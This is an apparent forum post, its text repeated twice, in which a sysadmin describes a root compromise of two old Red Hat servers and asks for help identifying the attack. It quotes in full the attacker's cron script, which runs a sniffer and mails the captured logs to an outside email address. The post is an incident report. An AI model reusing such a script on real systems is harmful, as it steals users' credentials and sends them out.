mjpatlarge
Programmer
Hi folks,
I recently experienced an attack on two older (6.x) Redhat servers and have not been able to find anything on the net that sounds like it (one box did not use OpenSSL so it could not have come in that way) so I thought I would inquire.
Once the attack gets root (not clear how -- could have gone in through bind which was a bit out of date on those machines) is creates a script called dnsquery in cron.daily
which apparently grabs some info with popclean and emails it out:
===========================
#!/bin/sh
cd /usr/lib/
./popclean -r pop.log > test
mail eckosniffer@yahoo.com -s "Sniff $(uname -a)" < test
kill -9 `/sbin/pidof /usr/lib/popclean`
rm -rf test pop.log
A=$PATH
export PATH=/usr/lib/
popclean -w pop.log &
export PATH=$A
=================================
Interestingly enough that file cannot be deleted or chowned, even by root (although it can be disabled by moving the whole cron.daily directory somewhere else.
Many binaries appear to have been contaminated as well
(I discovered the attack when ls acquired a bash alias it didn't have before), and copying a new binary on the system seems to automaticaly contaminate it (i.e. by the time it gets onto the infected system it grows by about 2000 bytes).
Also, once a night a particular address tried to contact it through a binary called sysinit (which appeared in /usr/bin and is 711890 bytes). Not sure how it comes to run, as it does not appear to be cron-ed anywhere.
Anyway, am getting ready to take both systems up to 8.0 to get rid of thing but am curious as to whether this rings any bells with anyone. Thanks for your time.
I recently experienced an attack on two older (6.x) Redhat servers and have not been able to find anything on the net that sounds like it (one box did not use OpenSSL so it could not have come in that way) so I thought I would inquire.
Once the attack gets root (not clear how -- could have gone in through bind which was a bit out of date on those machines) is creates a script called dnsquery in cron.daily
which apparently grabs some info with popclean and emails it out:
===========================
#!/bin/sh
cd /usr/lib/
./popclean -r pop.log > test
mail eckosniffer@yahoo.com -s "Sniff $(uname -a)" < test
kill -9 `/sbin/pidof /usr/lib/popclean`
rm -rf test pop.log
A=$PATH
export PATH=/usr/lib/
popclean -w pop.log &
export PATH=$A
=================================
Interestingly enough that file cannot be deleted or chowned, even by root (although it can be disabled by moving the whole cron.daily directory somewhere else.
Many binaries appear to have been contaminated as well
(I discovered the attack when ls acquired a bash alias it didn't have before), and copying a new binary on the system seems to automaticaly contaminate it (i.e. by the time it gets onto the infected system it grows by about 2000 bytes).
Also, once a night a particular address tried to contact it through a binary called sysinit (which appeared in /usr/bin and is 711890 bytes). Not sure how it comes to run, as it does not appear to be cron-ed anywhere.
Anyway, am getting ready to take both systems up to 8.0 to get rid of thing but am curious as to whether this rings any bells with anyone. Thanks for your time.
![[pc]](/data/assets/smilies/pc.gif "[pc] [pc]")